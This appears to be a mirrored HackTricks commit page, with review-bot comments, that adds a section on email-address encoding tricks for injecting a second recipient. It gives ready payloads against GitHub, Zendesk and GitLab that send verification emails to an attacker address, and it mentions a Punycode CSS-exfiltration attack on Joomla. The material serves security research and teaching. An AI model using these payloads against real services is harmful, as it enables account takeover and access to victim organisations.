mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 21:24:06 +00:00
GITBOOK-4384: No subject
parent
144069a83c
commit
2ed24193bb
3 changed files with 71 additions and 42 deletions
|
@ -840,7 +840,6 @@
|
||||||
* [Burp Suite](todo/burp-suite.md)
|
* [Burp Suite](todo/burp-suite.md)
|
||||||
* [Other Web Tricks](todo/other-web-tricks.md)
|
* [Other Web Tricks](todo/other-web-tricks.md)
|
||||||
* [Interesting HTTP](todo/interesting-http.md)
|
* [Interesting HTTP](todo/interesting-http.md)
|
||||||
* [Emails Vulnerabilities](todo/emails-vulns.md)
|
|
||||||
* [Android Forensics](todo/android-forensics.md)
|
* [Android Forensics](todo/android-forensics.md)
|
||||||
* [TR-069](todo/tr-069.md)
|
* [TR-069](todo/tr-069.md)
|
||||||
* [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md)
|
* [6881/udp - Pentesting BitTorrent](todo/6881-udp-pentesting-bittorrent.md)
|
||||||
|
|
|
@ -3,14 +3,14 @@
|
||||||
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
\
|
\
|
||||||
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||||
Get Access Today:
|
Get Access Today:
|
||||||
|
|
||||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
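Review bot: In the Trickest text link the new line backslash-escapes `_` and `&` inside the URL (`utm\_source=hacktricks\&utm\_medium=text...`), while the `{% embed url="..." %}` line a few lines below keeps the same query string unescaped. A renderer that does not process backslash escapes in link destinations will request a URL containing literal backslashes, so the link target is better left as it was on the old line. The `/.gitbook/` to `../.gitbook/` change in the same hunk is independent and can stay.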
@ -97,6 +97,10 @@ Depending on the **origin of the sendmail** binary different options have been d
|
||||||
|
|
||||||
## Inject in the e-mail name
|
## Inject in the e-mail name
|
||||||
|
|
||||||
|
{% hint style="danger" %}
|
||||||
|
Note that if you manage to create an account in a service with an arbitrary domain name (like Github, Gitlab, CloudFlare Zero trust...) and verify it receiving the verification email in your mail address, you might be able to access sensitive locations of the victim company
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
### Ignored parts of an email
|
### Ignored parts of an email
|
||||||
|
|
||||||
The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
|
The symbols: **+, -** and **{}** in rare occasions can be used for tagging and ignored by most e-mail servers
|
||||||
|
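Review bot: The new `{% hint style="danger" %}` under "Inject in the e-mail name" states the impact ("access sensitive locations of the victim company") without saying what grants that access, and it appears before any of the techniques it depends on. Suggest adding the missing condition (presumably that the service treats a verified address on the company's domain as proof of membership) and moving the hint after the "Email Encoding" subsection it relates to. The sentence also lacks a closing period, and "CloudFlare Zero trust" is inconsistently capitalised.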
@ -122,6 +126,67 @@ You can also use IPs as domain named between square brackets:
|
||||||
* john.doe@\[127.0.0.1]
|
* john.doe@\[127.0.0.1]
|
||||||
* john.doe@\[IPv6:2001:db8::1]
|
* john.doe@\[IPv6:2001:db8::1]
|
||||||
|
|
||||||
|
### Email Encoding
|
||||||
|
|
||||||
|
As explained in [**this research**](https://portswigger.net/research/splitting-the-email-atom), email names also can also contain encoded characters:
|
||||||
|
|
||||||
|
* **PHP 256 overflow**: PHP `chr` function will continue adding 256 to a char until it becames positive and then do the operation `%256`.
|
||||||
|
* `String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @`
|
||||||
|
|
||||||
|
{% hint style="success" %}
|
||||||
|
The goal of this trick is to end with an injection like `RCPT TO:<"collab@psres.net>collab"@example.com>`\
|
||||||
|
that will send the verification email to a different email address from the expected one (therefore to introduce another email address inside the email name and break the syntax when sending the email)
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
Different encodings:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
# Format
|
||||||
|
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com
|
||||||
|
|
||||||
|
# =? -> Start of encode
|
||||||
|
# utf-8 -> encoding used
|
||||||
|
# ? -> separator
|
||||||
|
# q -> type of encoding
|
||||||
|
# ? -> separator
|
||||||
|
# =41=42=43 -> Hex encoded data
|
||||||
|
# ?= end of encoding
|
||||||
|
|
||||||
|
# Other encodings, same example:
|
||||||
|
# iso-8859-1
|
||||||
|
=?iso-8859-1?q?=61=62=63?=hi@example.com
|
||||||
|
# utf-8
|
||||||
|
=?utf-8?q?=61=62=63?=hi@example.com
|
||||||
|
# utf-7
|
||||||
|
=?utf-7?q?<utf-7 encoded string>?=hi@example.com
|
||||||
|
# q encoding + utf-7
|
||||||
|
=?utf-7?q?&=41<utf-7 encoded string without initial A>?=hi@example.com
|
||||||
|
# base64
|
||||||
|
=?utf-8?b?QUJD?=hi@example.com
|
||||||
|
# bas64 + utf-7
|
||||||
|
=?utf-7?q?<utf-7 encoded string in base64>?=hi@example.com
|
||||||
|
#punycode
|
||||||
|
x@xn--svg/-9x6 → x@<svg/
|
||||||
|
```
|
||||||
|
|
||||||
|
Payloads:
|
||||||
|
|
||||||
|
* Github: `=?x?q?collab=40psres.net=3e=00?=foo@example.com`
|
||||||
|
* Note the encoded `@` as =40, the encoded `>` as `=3e` and `null` as `=00` 
|
||||||
|
* It'll send the verification email to `collab@psres.net`
|
||||||
|
* Zendesk: `"=?x?q?collab=22=40psres.net=3e=00==3c22x?="@example.com`
|
||||||
|
* Same trick as before but adding some regular quote at the beginning and encoded qoute `=22` before the encoded `@` and then starting and close some qoutes before the next email to fix the syntax used internally by Zendesk
|
||||||
|
* It'll send the verification email to `collab@psres.net`
|
||||||
|
* Gitlab: `=?x?q?collab=40psres.net_?=foo@example.com`
|
||||||
|
* Note the use of the underscore as a space to separate address
|
||||||
|
* It'll send the verification email to `collab@psres.net`
|
||||||
|
* Punycode: Using Punycode it was possible to inject a tag `<style` in Joomla and abuse it to steal the CSRF token via CSS exfiltration.
|
||||||
|
|
||||||
|
#### Tooling
|
||||||
|
|
||||||
|
* There is a **Burp Suite Turbo Intruder script** to fuzz these kind of combinations to try to attack email formats. The script already have potentially working combinations.
|
||||||
|
* It's laso possible to use [Hackvertor](https://portswigger.net/bappstore/65033cbd2c344fbabe57ac060b5dd100) to create an email splitting attack
|
||||||
|
|
||||||
### Other vulns
|
### Other vulns
|
||||||
|
|
||||||
![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
|
![https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](<../.gitbook/assets/image (1131).png>)
|
||||||
|
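Review bot: The **PHP 256 overflow** bullet describes PHP `chr`, but the only example under it is JavaScript (`String.fromCodePoint(0x10000 + 0x40) // 𐁀 → @`) and it does not show the `%256` behaviour the sentence names; give a `chr` example or retitle the bullet so text and example agree. In the encodings block, the line under `# bas64 + utf-7` uses `=?utf-7?q?...` where the label implies the `b` type, and the "same example" lines encode `=61=62=63` (abc) while the Format line encodes `=41=42=43` (ABC). The Turbo Intruder bullet names a script but gives no link, unlike the Hackvertor bullet next to it. Typos to fix in the added lines: "also can also", "becames", "bas64", "qoute" (twice), "laso", "these kind of", "The script already have".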
@ -161,8 +226,8 @@ For more detailed information, AWS's official documentation on handling bounces
|
||||||
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
|
* [https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0](https://www.youtube.com/watch?app=desktop\&v=4ZsTKvfP1g0)
|
||||||
|
|
||||||
{% hint style="success" %}
|
{% hint style="success" %}
|
||||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
Learn & practice AWS Hacking:<img src="../.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
Learn & practice GCP Hacking: <img src="../.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -178,7 +243,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
|
||||||
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
\
|
\
|
||||||
Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
Use [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
|
||||||
Get Access Today:
|
Get Access Today:
|
||||||
|
|
||||||
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
|
||||||
|
|
|
@ -1,35 +0,0 @@
|
||||||
# Emails Vulnerabilities
|
|
||||||
|
|
||||||
{% hint style="success" %}
|
|
||||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
||||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary>Support HackTricks</summary>
|
|
||||||
|
|
||||||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
||||||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
||||||
|
|
||||||
</details>
|
|
||||||
{% endhint %}
|
|
||||||
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
|
||||||
|
|
||||||
{% hint style="success" %}
|
|
||||||
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
|
||||||
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
|
||||||
|
|
||||||
<details>
|
|
||||||
|
|
||||||
<summary>Support HackTricks</summary>
|
|
||||||
|
|
||||||
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
|
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
|
||||||
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
|
||||||
|
|
||||||
</details>
|
|
||||||
{% endhint %}
|
|
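Review bot: The deleted `Emails Vulnerabilities` page held only two empty `##` headings between the training banners, so no content is lost, but nothing in the commit records why it goes away: the subject is "No subject" and the index entry `todo/emails-vulns.md` is removed in the first hunk without a replacement. Suggest a subject line that says the stub page was removed and where the email material now lives, so existing links to the old path can be traced.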